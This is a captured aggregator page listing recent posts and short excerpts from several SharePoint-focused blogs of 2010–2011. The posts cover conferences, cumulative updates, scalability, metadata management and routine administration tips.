<div class="entry-bound">Body: What do China, Vietnam and the Philippines... have in common? They are all getting a visit from top SharePoint speakers and experts in a community tour sponsored by fpweb.net.. STP speakers include renowned SharePoint professionals Joel Oleson, Dux Raymond Sy, Michael Noel, Paul Swider, Mark Miller, and Rob LaMear and our trusty reporter John Anderson. The first stop on this inaugural STP tour takes place exactly two weeks from today on Thursday, March 10 in Beijing... From China, the STP tour moves on to the Philippines where the STP event will take place in Manila on March 12... We&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/JoelsSharepointLand/~3/rZ_VBdP6b_4/ViewPost.aspx" rel="bookmark" target="_blank">The Experts Conference 2011 SharePoint Speaker Line Up Announced</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">22 Feb 2011 | 3:12 am</div>
<div class="entry-content">
<div class="entry-bound">I...ve been enjoying what I like to think of as yearbook pictures from various conferences... It...s always such a tough choice for people to decide what conference to go to... I think we should get a big book of all of the people in the SharePoint community all together in one book... I...d totally buy it... Here...s a quick shot of who...s who in speaking at TEC 2011 The Experts Conference at Red Rock in Las Vegas in April 17-20 (follows Best Practices Europe)... I think it...s an impressive line up of key speakers from the SharePoint community covering key topics. Hope to see you and your&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11138" class="feed-block baa81913c503251d80f2827d2115fb28">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.msdn.com/b/pandrew/" target="_blank" class="snap_shots">Paul Andrew</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pandrew/archive/2011/02/24/my-favourite-sharepoint-2010-scalability-articles.aspx" rel="bookmark" target="_blank">My Favourite SharePoint 2010 Scalability Articles</a></h3>

<div class="full-post">
<div class="author">Paul Andrew</div>
<div class="published">24 Feb 2011 | 12:35 pm</div>
<div class="entry-content">
<div class="entry-bound">The scalability test results for SharePoint large scale document management is here. The SharePoint 2010 support boundaries and limits document is here.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pandrew/archive/2011/02/07/new-rbs-whitepaper-just-published.aspx" rel="bookmark" target="_blank">New RBS whitepaper just published</a></h3>

<div class="full-post">
<div class="author">Paul Andrew</div>
<div class="published">7 Feb 2011 | 9:11 pm</div>
<div class="entry-content">
<div class="entry-bound">RBS is an add-in technology for SharePoint that stores large binary data such as word documents outside of the primary SQL database. It is useful to move some of this data onto less expensive storage media. A new paper on Remote Blob Storage (RBS) has just been published which is really helpful in understanding it. Get the paper here. Referenced from this SQL Server page. And it was authored by these guys.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pandrew/archive/2010/12/20/visual-studio-2008-extensions-for-windows-sharepoint-services-vsewss-v1-3-released.aspx" rel="bookmark" target="_blank">Visual Studio 2008 extensions for Windows SharePoint Services (VSEWSS) v1.3 Released</a></h3>

<div class="full-post">
<div class="author">Paul Andrew</div>
<div class="published">20 Dec 2010 | 2:25 pm</div>
<div class="entry-content">
<div class="entry-bound">The VSeWSS v1.3 is now released and is available for download here. You should uninstall the VSeWSS 1.3 CTP and install this version. There is no difference to the project file format so Visual Studio 2008 projects using the VSeWSS format should not require any upgrading from the CTP. The tools are available in 9 languages including English, Japanese, German, French, Spanish, Italian, Korean, Chinese (Simplified), and Chinese (Traditional). They are intended to be used with the Visual Studio 2008 install of the same language. Please note: These are the development tools for SharePoint 2007&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pandrew/archive/2010/12/13/new-spdisposecheck-release-available.aspx" rel="bookmark" target="_blank">New SPDisposeCheck release available</a></h3>

<div class="full-post">
<div class="author">Paul Andrew</div>
<div class="published">13 Dec 2010 | 9:26 am</div>
<div class="entry-content">
<div class="entry-bound">I've been working on the SPDisposeCheck tool with&nbsp;a few other guys and we've just finished a new release. You will find lots more information about the new release at Roger Lamb's blog.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pandrew/archive/2010/09/22/live-chats-to-learn-more-about-sharepoint-with-the-mvp-experts.aspx" rel="bookmark" target="_blank">Live Chats to Learn more about SharePoint with the MVP Experts</a></h3>

<div class="full-post">
<div class="author">Paul Andrew</div>
<div class="published">22 Sep 2010 | 9:10 pm</div>
<div class="entry-content">
<div class="entry-bound">The ever popular MVP chats are back. Cross posting from here. Do you have questions about SharePoint? Want to learn more about the recently launched SharePoint 2010?&#160; By popular request, SharePoint MVPs from around the world are participating in a live chat event about SharePoint. These Q&amp;A events are a great opportunity to tap into the vast knowledge of these industry professionals who are regarded as the best in their field. Please join us on Wednesday Sept 29th at 9am PDT or noon EST.&#160; Learn more and add these chats to your calendar by visiting the MSDN event page&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11139" class="feed-block 6c056727b5a47c9b1820eedc913b155f">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.technet.com/b/wbaer/" target="_blank" class="snap_shots">Bill Baer</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/wbaer/~3/iGjXEMvgBOw/system-center-virtual-machine-manager-self-service-portal-2-0-service-pack-1-beta.aspx" rel="bookmark" target="_blank">System Center Virtual Machine Manager Self-Service Portal 2.0 Service Pack 1 Beta</a></h3>

<div class="full-post">
<div class="author">wbaer</div>
<div class="published">7 Mar 2011 | 9:03 am</div>
<div class="entry-content">
<div class="entry-bound">System Center Virtual Machine Manager Self-Service Portal 2.0 is a pre-built, role-based, self-service portal for both datacenter managers and business unit IT consumers to simplify the provisioning of infrastructures for their applications and services...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/wbaer/~3/esAa1gzRWqw/filestream-and-sharepoint-2010.aspx" rel="bookmark" target="_blank">FILESTREAM and SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">wbaer</div>
<div class="published">22 Feb 2011 | 10:33 am</div>
<div class="entry-content">
<div class="entry-bound">FILESTREAM is a new feature in SQL Server 2008 that enables the storage of unstructured data on a NTFS file system.&#160; FILESTREAM (local or remote) is supported in SharePoint 2010 as one mechanism of reducing capital expenditures through enabling the...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/wbaer/~3/Nka9D2sQQfE/resources-for-virtualizing-sharepoint-2010.aspx" rel="bookmark" target="_blank">Resources for Virtualizing SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">wbaer</div>
<div class="published">27 Dec 2010 | 11:21 am</div>
<div class="entry-content">
<div class="entry-bound">As more organizations seek to reduce operating and capital expenditures, solve the challenges of datacenter density, and provide elasticity to their SharePoint deployments ... virtualization becomes the focal point of discussion.&#160; SharePoint 2010 provides...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/wbaer/~3/Or9bTw94CIQ/multi-tenancy-in-sharepoint-2010.aspx" rel="bookmark" target="_blank">Multi-tenancy in SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">wbaer</div>
<div class="published">10 Dec 2010 | 11:50 am</div>
<div class="entry-content">
<div class="entry-bound">The traditional and most accurate definition of multi-tenancy remains as a single instance of software that services multiple organizations or clients virtually partitioning its data and configuration allowing those clients to work within a customized...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/wbaer/~3/2hlPhmzL0q0/announcing-the-search-first-migration-accelerator.aspx" rel="bookmark" target="_blank">Announcing the Search First Migration Accelerator</a></h3>

<div class="full-post">
<div class="author">wbaer</div>
<div class="published">22 Nov 2010 | 7:48 am</div>
<div class="entry-content">
<div class="entry-bound">Understanding search is the primary means in the Enterprise for surfacing and locating information...as a result, it has become a mission critical component of SharePoint deployments.&#160; The rise in adoption of SharePoint 2010 in organizations has led...(read more)</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed11140" class="feed-block 649ab03a3d1c484eee49f5679ed8d3da">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.technet.com/b/stefan_gossner/" target="_blank" class="snap_shots">Stefan Go..ner</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/stefan_gossner/archive/2011/03/04/delayed-february-2011-cu-for-sharepoint-2010-is-now-available.aspx" rel="bookmark" target="_blank">Delayed February 2011 CU for SharePoint 2010 is now available</a></h3>

<div class="full-post">
<div class="author">Stefan Go..ner</div>
<div class="published">3 Mar 2011 | 10:52 pm</div>
<div class="entry-content">
<div class="entry-bound">Finally also the February 2011 CU for the SharePoint 2010 product family has been released. The MOSS 2007 fixes have been released rougly two weeks ago. Some of the KB articles are not yet available (as usual it will take a couple more days to get these...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/stefan_gossner/archive/2011/02/23/february-2011-cu-for-sharepoint-2007-has-been-released-today.aspx" rel="bookmark" target="_blank">February 2011 CU for SharePoint 2007 has been released today</a></h3>

<div class="full-post">
<div class="author">Stefan Go..ner</div>
<div class="published">23 Feb 2011 | 4:43 am</div>
<div class="entry-content">
<div class="entry-bound">Yesterday the product group released the February 2011 Cumulative Update for the SharePoint 2007 product family. The Februray 2011 CU for SharePoint 2010 will be released in a couple of days. The KB articles are not yet available (as usual it will take...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/stefan_gossner/archive/2011/02/04/common-problem-nullreferenceexception-when-using-the-variationdatasource-on-a-sharepoint-master-page.aspx" rel="bookmark" target="_blank">Common Problem: NullReferenceException when using the VariationDataSource on a SharePoint master page</a></h3>

<div class="full-post">
<div class="author">Stefan Go..ner</div>
<div class="published">4 Feb 2011 | 1:32 am</div>
<div class="entry-content">
<div class="entry-bound">A common scenario with Variations is to customize the variation label menu which allows to switch between different labels by using (e.g.) a Repeater or DataList control which is bound to a VariationDataSource . You can achieve this easily by either writing...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/stefan_gossner/archive/2011/01/03/december-2010-cu-for-sharepoint-2007-and-2010-has-been-released-on-friday.aspx" rel="bookmark" target="_blank">December 2010 CU for SharePoint 2007 and 2010 has been released on Friday</a></h3>

<div class="full-post">
<div class="author">Stefan Go..ner</div>
<div class="published">3 Jan 2011 | 1:48 am</div>
<div class="entry-content">
<div class="entry-bound">Yesterday the product group released the December 2010 Cumulative Update for the SharePoint 2007 and 2010 product family. The KB articles are not yet available (as usual it will take a couple more days to get these through the required release process...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/stefan_gossner/archive/2010/12/29/interesting-changetoken-problem-when-mixing-complete-and-selective-deployment.aspx" rel="bookmark" target="_blank">Interesting ChangeToken problem when mixing complete and selective deployment</a></h3>

<div class="full-post">
<div class="author">Stefan Go..ner</div>
<div class="published">29 Dec 2010 | 5:20 am</div>
<div class="entry-content">
<div class="entry-bound">Just today I noticed a new flavor of the frequent Change Token problem: "The changeToken refers to a time before the start of the current change log." As discussed each content deployment job is responsible to update the change tokens for the selected...(read more)</div>
</div>
</div>

</li>
</ul><ul id="feed11141" class="feed-block b9eb7db3c31bf385dfa0e2ec78d2432e">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://thorprojects.com/blog" target="_blank" class="snap_shots">Not Fit For Print - Robert Bogue [MVP]</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/NotFitForPrint/~3/-oGqVVFd5ag/help-with-the-sharepoint-shepherds-guide.aspx" rel="bookmark" target="_blank">Help with the SharePoint Shepherd's Guide</a></h3>

<div class="full-post">
<div class="author">Robert L. Bogue</div>
<div class="published">13 Feb 2011 | 12:46 am</div>
<div class="entry-content">
<div class="entry-bound">One of the things that The SharePoint Shepherd's Guide for End Users: 2010 was specifically targeted at was getting users help when they needed it. That's been fairly easy for our corporate licensees, if a user decided to do a search. They could search for something like adding a column and the Shepherd's Guide topic would show up for them. However, one of the challenges has been that if the user chose to hit the help link on the page they'd get the generic SharePoint help and therefore wouldn't have the benefit of the Shepherd's Guide material. However, in SharePoint 2010 the help system is&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/NotFitForPrint/~3/BdXGduIpsJ4/hands-on-labs-for-the-sharepoint-guidance.aspx" rel="bookmark" target="_blank">Hands on Labs for the SharePoint Guidance</a></h3>

<div class="full-post">
<div class="author">Robert L. Bogue</div>
<div class="published">5 Feb 2011 | 12:52 am</div>
<div class="entry-content">
<div class="entry-bound">I've mentioned before that my work on the SharePoint Guidance with the guys at Microsoft Patterns and Practices, Todd Baginski, and the entire advisory team has been one of the highlights of my professional career. While I've been busy so have they. They have just posted some hands on labs for the guidance. If you thought &quot;How am I supposed to learn how to use this stuff?&quot; ... well now you have an answer. Go check it out.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/NotFitForPrint/~3/xlRnUNdow40/designing-solutions-for-microsoft-sharepoint-2010.aspx" rel="bookmark" target="_blank">Designing Solutions for Microsoft SharePoint: 2010</a></h3>

<div class="full-post">
<div class="author">Robert L. Bogue</div>
<div class="published">11 Jan 2011 | 11:28 pm</div>
<div class="entry-content">
<div class="entry-bound">I've previously mentioned the work that I did on the Microsoft Patterns and Practices SharePoint Guidance. However, what I didn't mention was that the work was being converted (adapted) to book form. The book is Designing Solutions for Microsoft SharePoint 2010: Making the Right Architecture and Implementation Decisions. Although I've not seen my copy yet, I know the content and I know it's an essential guide for any senior developer or architect working on a SharePoint project of any scale. You won't find every nuance covered ... no book could do that for SharePoint. However, you will find&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/NotFitForPrint/~3/8YsDGpB9P2s/serial-aka-rs-232-and-relearning.aspx" rel="bookmark" target="_blank">Serial AKA RS-232 and Relearning</a></h3>

<div class="full-post">
<div class="author">Robert L. Bogue</div>
<div class="published">12 Dec 2010 | 1:54 pm</div>
<div class="entry-content">
<div class="entry-bound">During some of that work on my network I've been talking about over the last few posts, I stumbled across a realization that I wanted to share. Before I get there, I have to explain that I was turning on VLANs for my wireless network. My network has an inner ring where my files are stored and which has a site-to-site VPN to the colocation center. However, there's an outer ring behind the U-Verse gateway. I wanted to allow guest wireless to this network ... thus they could get to the Internet and I didn't have to worry about them on my network. I setup VLAN 1 as my private network and VLAN 2&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/NotFitForPrint/~3/zWv5aU0Yhz8/virtual-switch-loops.aspx" rel="bookmark" target="_blank">Virtual Switch Loops</a></h3>

<div class="full-post">
<div class="author">Robert L. Bogue</div>
<div class="published">12 Dec 2010 | 7:46 am</div>
<div class="entry-content">
<div class="entry-bound">For some time I've had some issues on my network. They don't happen very often so they've been hard to track down. I know for sure that one of the issues I have is that one of my Linksys SGE2024 refuses to hold on to its configuration if it loses power. This is made more difficult by the fact that the power supply in the unit has a very low capacitance. As a result of that it will appear to lose its configuration randomly. Take a look at my last post What is a UPS, Really? for the details on that. However, I also had these weird &quot;storms&quot; where I'd start losing packets and despite my&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11143" class="feed-block c80053e13b6912a18587a4b8048ac3b3">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.msdn.com/b/ecm/" target="_blank" class="snap_shots">Microsoft Enterprise Content Management (ECM) Team Blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/ecm/archive/2011/03/06/taxonomy-the-challenge-of-starting-from-scratch.aspx" rel="bookmark" target="_blank">Taxonomy...The Challenge of Starting from Scratch</a></h3>

<div class="full-post">
<div class="author">ecmblog</div>
<div class="published">6 Mar 2011 | 8:35 pm</div>
<div class="entry-content">
<div class="entry-bound">One of the most talked about capabilities since the launch of SharePoint 2010 is the Managed Metadata Service.&#160; For those of you who aren...t already familiar with this service and the support it provides for modeling and deploying a rich corporate taxonomy, I...d recommend reading Pat...s post Introducing Enterprise Metadata Management.&#160; For those of you who are familiar with the great taxonomy capabilities in SharePoint 2010, I...m sure many of you have spent time looking at an empty term store wondering where to start.&#160; If you...re lucky, you already have a well defined&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/ecm/archive/2010/07/16/announcing-the-release-of-the-cmis-connector-for-sharepoint.aspx" rel="bookmark" target="_blank">Announcing the Release of the CMIS Connector for SharePoint</a></h3>

<div class="full-post">
<div class="author">ecmblog</div>
<div class="published">16 Jul 2010 | 12:13 am</div>
<div class="entry-content">
<div class="entry-bound">I...m pleased to announce that we have Released to Web, the Content Management Interoperability Services (CMIS) Connector for SharePoint.&#160; The CMIS Connector for SharePoint ships as part of the SharePoint 2010 Administration Toolkit, providing a CMIS interface over the top of SharePoint as well as a CMIS Consumer Web Part that can be used to display content from other CMIS enabled repositories. You can download the SharePoint 2010 Administration Toolkit today and start to take advantage of this new set of capabilities within SharePoint Server 2010 by building your own Composite Content&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/ecm/archive/2010/06/22/introducing-enterprise-metadata-management.aspx" rel="bookmark" target="_blank">Introducing Enterprise Metadata Management</a></h3>

<div class="full-post">
<div class="author">ecmblog</div>
<div class="published">22 Jun 2010 | 2:31 pm</div>
<div class="entry-content">
<div class="entry-bound">Hi there, my name is Pat Miller, and I am the development lead for the Enterprise Metadata / Taxonomy features in SharePoint 2010.&#160; I've been working on the ECM team and its fore-bearers for the better part of 11 years now, first with NCompass Labs which was acquired by Microsoft in 2001, then on the Content Management Server team, then with the CMS team as part of MOSS 2007.&#160; This is the first of many blog posts on the Enterprise Metadata Management (EMM) system in the 2010 release.&#160; This will be the overview of the system, and future posts will drill into specific areas like&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/ecm/archive/2010/06/22/variations-propagate-pages-on-your-terms.aspx" rel="bookmark" target="_blank">Variations: Propagate Pages on Your Terms</a></h3>

<div class="full-post">
<div class="author">ecmblog</div>
<div class="published">22 Jun 2010 | 1:06 pm</div>
<div class="entry-content">
<div class="entry-bound">Hi everyone, I'd like to answer a common question about how to modify the behavior the Variations feature in SharePoint 2010 uses when propagating pages. That is, how pages in the source variation site are copied and appear on target variation sites as minor draft versions. Page propagation is triggered by publishing a page on the source variation site by default. Each time you publish a source page, the Variations Event Receiver adds a work item to the Variations Propagate Pages timer job queue. When the timer job runs, it will begin executing the first 100 page propagation work items. For&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/ecm/archive/2010/06/14/email-management-and-sharepoint.aspx" rel="bookmark" target="_blank">Email Management and SharePoint</a></h3>

<div class="full-post">
<div class="author">ecmblog</div>
<div class="published">14 Jun 2010 | 10:59 pm</div>
<div class="entry-content">
<div class="entry-bound">My colleagues in the Exchange team have introduced a wealth of new capabilities in Exchange 2010 to support email archiving, retention and discovery but I...m often asked how an organization should think about managing emails in SharePoint as part of an overall collaboration and content management strategy.&#160; While there are no hard and fast rules, it pays to think about four distinct scenarios: Personal email management Project and case management Email archiving Records management Each of these scenarios has a set of desired outcomes and set of capabilities that best meet those outcomes&hellip;</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed11144" class="feed-block ed395347301a3744953e716feb6617d1">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.msdn.com/b/arpans/" target="_blank" class="snap_shots">Arpan Shah's Blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/arpans/archive/2011/02/17/capgemini-posts-review-of-project-2010.aspx" rel="bookmark" target="_blank">CapGemini Posts Review of Project 2010</a></h3>

<div class="full-post">
<div class="author">ArpanS</div>
<div class="published">17 Feb 2011 | 9:15 am</div>
<div class="entry-content">
<div class="entry-bound">CapGemini recently posted a comprehensive review of Project &amp; Project Server 2010 that you can download and read. You can find the pointer along with excerpts from the review at http://blogs.msdn.com/b/project/archive/2011/02/17/capgemini-posts-review-of-project-2010.aspx.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/arpans/archive/2011/01/27/microsoft-is-a-leader-in-enterprise-it-ppm-and-alm.aspx" rel="bookmark" target="_blank">Microsoft is a leader in Enterprise IT PPM and ALM</a></h3>

<div class="full-post">
<div class="author">ArpanS</div>
<div class="published">27 Jan 2011 | 8:00 am</div>
<div class="entry-content">
<div class="entry-bound">In IDC...s most recent PPM MarketScape, Microsoft was listed as a leader in the Enterprise IT PPM and ALM views. This is in line with what we...re hearing from our customer and partner communities. We...re seeing customers and partners deploying Project &amp; Project Server 2010 and realizing business benefit! You can read more about it on the Project team blog @ http://blogs.msdn.com/b/project/archive/2011/01/27/microsoft-positioned-as-a-leader-in-it-ppm-and-alm.aspx.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/arpans/archive/2011/01/11/microsoft-project-for-all-projects.aspx" rel="bookmark" target="_blank">Managing all your projects</a></h3>

<div class="full-post">
<div class="author">ArpanS</div>
<div class="published">11 Jan 2011 | 9:05 am</div>
<div class="entry-content">
<div class="entry-bound">No matter what your day job is, you...re involved in projects every day: testing a product, writing a whitepaper/book, running an event or even home ...projects... like buying groceries, building a home extension or raising money for a charity. Simply put, a project is a set of tasks that accomplish an objective. We tend to use the phrase Project Management when these ...projects... reach a certain level of complexity. But truth be told, whether you are managing a simple project or complex project, they have similar characteristics. In each and every case, you...re managing resources&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/arpans/archive/2011/01/07/poker-analyzer-windows-phone-7-application.aspx" rel="bookmark" target="_blank">Poker Analyzer Windows Phone 7 Application</a></h3>

<div class="full-post">
<div class="author">ArpanS</div>
<div class="published">7 Jan 2011 | 8:00 am</div>
<div class="entry-content">
<div class="entry-bound">If you...re a poker enthusiast and have a Windows Phone 7, I encourage you to check out an application I recently published: Poker Analyzer. Poker Analyzer is for poker enthusiasts who want to improve their poker skills. Poker Analyzer gives accurate winning probabilities for any Texas Hold'em situation up to 12 players. With Poker Analyzer, you can choose specific cards and immediately see how the odds change - just like you see on TV! This is an ideal application for anyone looking to play online poker, analyze various scenarios or just gain more insight into Texas Hold'em! Features&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/arpans/archive/2010/12/31/a-look-back-at-2010.aspx" rel="bookmark" target="_blank">A look back at 2010</a></h3>

<div class="full-post">
<div class="author">ArpanS</div>
<div class="published">31 Dec 2010 | 11:52 am</div>
<div class="entry-content">
<div class="entry-bound">With the year coming to an end, I want to thank everyone for their support &amp; wish everyone a very happy new year! 2010 was a busy &amp; exciting year for Microsoft! As I mentioned in a previous post, we saw some great exciting technology on the consumer and the enterprise side: Kinect, Office 2010 (including Project 2010 &amp; SharePoint 2010), Windows Phone 7, IE 9.0 beta, Office 365 beta just to name a few.&#160; It was nice to see some recognition ... for example the article from TheStreet @ http://www.thestreet.com/story/10953596/1/10-top-innovative-companies.html that lists Microsoft&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11150" class="feed-block 42004c123bd80c691c6e1163d3db22a4">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.tamtam.nl/" target="_blank" class="snap_shots">Tam Tam Blogs</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.tamtam.nl/nieuws/2011/02/19/Hoe+Cre%C3%ABer+Je+Online+Likeability.aspx" rel="bookmark" target="_blank">Hoe cre..er je online likeability?</a></h3>

<div class="full-post">
<div class="author">Marlien de Roo</div>
<div class="published">19 Feb 2011 | 1:57 am</div>
<div class="entry-content">
<div class="entry-bound">Air France. BP. Carglass. Drie willekeurige merken die zo op het eerste gezicht niets met elkaar gemeen lijken te hebben. Wat hebben ze gedaan? Nou, eigenlijk hebben ze vooral iets NIET gedaan. Ze hebben niet naar ons, de consument, geluisterd. En dat zullen ze weten. Toen de aswolk Europa in april 2010 teisterde en mensen behoefte hadden aan informatie bleef AirFrance stil, terwijl KLM verontruste reizigers persoonlijk up-to-date hield en verder hielp via Twitter en Facebook. Artikel op dutch cowgirls van Lisette Beentjes !</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.tamtam.nl/duarte/2011/02/03/Adding+Metadata+To+A+Folder.aspx" rel="bookmark" target="_blank">Adding Metadata to a folder</a></h3>

<div class="full-post">
<div class="author">Duarte Nobrega</div>
<div class="published">3 Feb 2011 | 6:25 am</div>
<div class="entry-content">
<div class="entry-bound">If you wish to add metadata to a Document library folder it is posible. Just follow through this nice step by step article: http://sharepoint-guru.blogspot.com/2007/06/adding-metadata-to-folder.html .. Good luck!</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.tamtam.nl/operational-services/2011/02/03/Wintercampagne+Oxxio+Design+Vanuit+Je+Bezoekers.aspx" rel="bookmark" target="_blank">Wintercampagne Oxxio - Design vanuit je bezoekers</a></h3>

<div class="full-post">
<div class="author">Patrick Steenks</div>
<div class="published">3 Feb 2011 | 3:11 am</div>
<div class="entry-content">
<div class="entry-bound">Zoals bij ieder commercieel bedrijf is de website van Oxxio een belangrijk verlengstuk van de marketing campagnes. Tam Tam zorgt daarbij voor de vertaling online. De lancering van de nieuwe wintercampagne was een uitgelezen kans om het gehele aanmeldproces onder handen te nemen. Tam Tam werkt al sinds een aantal jaren nauw samen met Oxxio en fungeert daarbij als vaste partner voor haar website. Wat het werken met Oxxio zo prettig maakt is dat zij openstaat voor nieuwe mogelijkheden en dat zij graag als early adopter wil fungeren voor innovatieve technologi..n. Dit komt onder meer tot&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.tamtam.nl/duarte/2011/01/06/SharePoint+Code+Blocks+Are+Not+Allowed+In+This+File.aspx" rel="bookmark" target="_blank">SharePoint: Code blocks are not allowed in this file</a></h3>

<div class="full-post">
<div class="author">Duarte Nobrega</div>
<div class="published">6 Jan 2011 | 6:57 am</div>
<div class="entry-content">
<div class="entry-bound">After editing a masterpage, or page layout you get the following error: &quot; An error occurred during the processing of /_catalogs/masterpage/masterpagename.master. Code blocks are not allowed in this file. &quot; .. Solution: .. 1. open the web.config add the following code in &lt;sharepoint&gt; &lt;safemode..&gt;: ......&lt;SharePoint&gt; ...... &lt;SafeMode MaxControls=&quot;200&quot; CallStack=&quot;false&quot; DirectFileDependencies=&quot;10&quot; TotalFileDependencies=&quot;50&quot; AllowPageLevelTrace=&quot;false&quot;&gt; .......... &lt;PageParserPaths&gt; ..&lt;PageParserPath&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.tamtam.nl/duarte/2011/01/03/Change+The+Port+For+Central+Administration.aspx" rel="bookmark" target="_blank">Change the port for Central Administration</a></h3>

<div class="full-post">
<div class="author">Duarte Nobrega</div>
<div class="published">3 Jan 2011 | 6:36 am</div>
<div class="entry-content">
<div class="entry-bound">This is piece of cake! Just apply the following command: Stsadm ...o setadminport ...port..99999 This command will change SharePoint Central Administration v3 to run on port 9999. No need for IISRESET or reboot. Enjoy!</div>
</div>
</div>

</li>
</ul><ul id="feed11151" class="feed-block 47bc0c897ce6c114deba466664d815b6">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.harbar.net/Default.aspx" target="_blank" class="snap_shots">harbar.net</a></h2>
</li>
<li class="hentry">
